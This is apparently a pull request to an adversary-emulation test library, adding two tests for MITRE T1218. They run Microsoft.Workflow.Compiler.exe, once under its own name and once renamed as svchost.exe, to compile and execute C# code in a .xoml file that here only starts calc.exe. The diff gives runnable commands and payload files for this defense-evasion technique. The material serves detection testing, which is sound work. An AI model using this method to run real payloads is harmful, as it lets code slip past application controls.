### PR TITLE
Workflow compiler tests

### DIFF
--- a/atomics/T1218/T1218.yaml
+++ b/atomics/T1218/T1218.yaml
@@ -123,3 +123,54 @@ atomic_tests:
     elevation_required: false
     command: |
       "#{microsoft_wordpath}\protocolhandler.exe" "ms-word:nft|u|#{remote_url}"
+- name: Microsoft.Workflow.Compiler.exe Payload Execution
+  description: |
+    Emulates attack with Microsoft.Workflow.Compiler.exe running a .Net assembly that launches calc.exe
+  supported_platforms:
+    - windows
+  input_arguments:
+    xml_payload:
+      description: XML to execution
+      type: path
+      default: PathToAtomicsFolder\T1218\src\T1218.xml
+  dependency_executor_name: powershell 
+  dependencies: 
+    - description: |
+        .Net must be installed for this test to work correctly.
+      prereq_command: | 
+        if (Test-Path C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe ) {exit 0} else {exit 1}
+      get_prereq_command: | 
+        write-host ".Net must be installed for this test to work correctly."
+  executor:
+    command: |
+      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe "#{xml_payload}" output.txt
+    name: powershell
+    elevation_required: false
+- name: Renamed Microsoft.Workflow.Compiler.exe Payload Executions
+  description: |
+    Emulates attack with a renamed Microsoft.Workflow.Compiler.exe running a .Net assembly that launches calc.exe
+  supported_platforms:
+    - windows
+  input_arguments:
+    xml_payload:
+      description: XML to execution
+      type: path
+      default: PathToAtomicsFolder\T1218\src\T1218.xml
+    renamed_binary:
+      description: renamed Microsoft.Workflow.Compiler
+      type: path
+      default: PathToAtomicsFolder\T1218\src\svchost.exe
+  dependency_executor_name: powershell 
+  dependencies: 
+    - description: |
+        .Net must be installed for this test to work correctly.
+      prereq_command: | 
+        Copy-Item C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe "#{renamed_binary}" -Force
+        if (Test-Path "#{renamed_binary}") {exit 0} else {exit 1}
+      get_prereq_command: | 
+        write-host "you need to rename workflow complier before you run this test"
+  executor:
+    command: |
+      #{renamed_binary} #{xml_payload} output.txt
+    name: powershell
+    elevation_required: false

--- a/atomics/T1218/T1218.yaml
+++ b/atomics/T1218/T1218.yaml
@@ -143,6 +143,7 @@ atomic_tests:
         write-host ".Net must be installed for this test to work correctly."
   executor:
     command: |
+      Set-Location -path PathToAtomicsFolder\T1218\src ;
       C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe "#{xml_payload}" output.txt
     name: powershell
     elevation_required: false
@@ -171,6 +172,7 @@ atomic_tests:
         write-host "you need to rename workflow complier before you run this test"
   executor:
     command: |
+      Set-Location -path PathToAtomicsFolder\T1218\src ;
       #{renamed_binary} #{xml_payload} output.txt
     name: powershell
     elevation_required: false

--- a/atomics/T1218/src/T1218.xml
+++ b/atomics/T1218/src/T1218.xml
@@ -1,7 +1,7 @@
 <?xml version="1.0" encoding="utf-8"?>
 <CompilerInput xmlns:i="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://schemas.datacontract.org/2004/07/Microsoft.Workflow.Compiler">
 <files xmlns:d2p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays">
-<d2p1:string>C:\Users\Tom Brady\Desktop\MWC_calc\test.xoml</d2p1:string>
+<d2p1:string>T1218.xoml</d2p1:string>
 </files>
 <parameters xmlns:d2p1="http://schemas.datacontract.org/2004/07/System.Workflow.ComponentModel.Compiler">
 <assemblyNames xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />

--- a/atomics/T1218/src/T1218.xml
+++ b/atomics/T1218/src/T1218.xml
@@ -1,0 +1,32 @@
+<?xml version="1.0" encoding="utf-8"?>
+<CompilerInput xmlns:i="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://schemas.datacontract.org/2004/07/Microsoft.Workflow.Compiler">
+<files xmlns:d2p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays">
+<d2p1:string>C:\Users\Tom Brady\Desktop\MWC_calc\test.xoml</d2p1:string>
+</files>
+<parameters xmlns:d2p1="http://schemas.datacontract.org/2004/07/System.Workflow.ComponentModel.Compiler">
+<assemblyNames xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
+<compilerOptions i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
+<coreAssemblyFileName xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler"></coreAssemblyFileName>
+<embeddedResources xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
+<evidence xmlns:d3p1="http://schemas.datacontract.org/2004/07/System.Security.Policy" i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
+<generateExecutable xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">false</generateExecutable>
+<generateInMemory xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">true</generateInMemory>
+<includeDebugInformation xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">false</includeDebugInformation>
+<linkedResources xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
+<mainClass i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
+<outputName xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler"></outputName>
+<tempFiles i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
+<treatWarningsAsErrors xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">false</treatWarningsAsErrors>
+<warningLevel xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">-1</warningLevel>
+<win32Resource i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
+<d2p1:checkTypes>false</d2p1:checkTypes>
+<d2p1:compileWithNoCode>false</d2p1:compileWithNoCode>
+<d2p1:compilerOptions i:nil="true" />
+<d2p1:generateCCU>false</d2p1:generateCCU>
+<d2p1:languageToUse>CSharp</d2p1:languageToUse>
+<d2p1:libraryPaths xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" i:nil="true" />
+<d2p1:localAssembly xmlns:d3p1="http://schemas.datacontract.org/2004/07/System.Reflection" i:nil="true" />
+<d2p1:mtInfo i:nil="true" />
+<d2p1:userCodeCCUs xmlns:d3p1="http://schemas.datacontract.org/2004/07/System.CodeDom" i:nil="true" />
+</parameters>
+</CompilerInput>

--- a/atomics/T1218/src/T1218.xoml
+++ b/atomics/T1218/src/T1218.xoml
@@ -1,0 +1,10 @@
+<SequentialWorkflowActivity x:Class="MyWorkflow" x:Name="MyWorkflow" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" xmlns="http://schemas.microsoft.com/winfx/2006/xaml/workflow">
+    <CodeActivity x:Name="codeActivity1" />
+    <x:Code><![CDATA[
+    public class Foo : SequentialWorkflowActivity {
+     public Foo() {
+            System.Diagnostics.Process.Start("calc.exe");
+        }
+    }
+    ]]></x:Code>
+</SequentialWorkflowActivity>


### PR DESCRIPTION
**Details:**
This MR adds support for 2 LOLBin tests related to Microsoft.Workflow.Compiler.exe. 
For more details on the threats surrounding Microsoft.Workflow.Compiler.exe please read Matt's write-up [here](https://posts.specterops.io/arbitrary-unsigned-code-execution-vector-in-microsoft-workflow-compiler-exe-3d9294bc5efb)

The 2 tests included are:

1. Generic execution of Microsoft.Workflow.Compiler passing in a pre-built .Net assembly that will spawn calc.exe
2. The second test will run the same payload as above but it will do it through a renamed version of the workflow compiler. 

**Testing:**
```
>Invoke-AtomicTest T1218 -TestNumbers 6 -CheckPrereqs
PathToAtomicsFolder = C:\AtomicRedTeam\atomic-red-team-master\atomics

CheckPrereq's for: T1218-6 Microsoft.Workflow.Compiler.exe Payload Execution
Prerequisites met: T1218-6 Microsoft.Workflow.Compiler.exe Payload Execution

>Invoke-AtomicTest T1218 -TestNumbers 6
PathToAtomicsFolder = C:\AtomicRedTeam\atomic-red-team-master\atomics

Executing test: T1218-6 Microsoft.Workflow.Compiler.exe Payload Execution
Done executing test: T1218-6 Microsoft.Workflow.Compiler.exe Payload Execution
```

```
>Invoke-AtomicTest T1218 -TestNumbers 7 -CheckPrereqs
PathToAtomicsFolder = C:\AtomicRedTeam\atomic-red-team-master\atomics

CheckPrereq's for: T1218-7 Renamed Microsoft.Workflow.Compiler.exe Payload Executions
Prerequisites met: T1218-7 Renamed Microsoft.Workflow.Compiler.exe Payload Executions

>Invoke-AtomicTest T1218 -TestNumbers 7
PathToAtomicsFolder = C:\AtomicRedTeam\atomic-red-team-master\atomics

Executing test: T1218-7 Renamed Microsoft.Workflow.Compiler.exe Payload Executions
Done executing test: T1218-7 Renamed Microsoft.Workflow.Compiler.exe Payload Executions
```
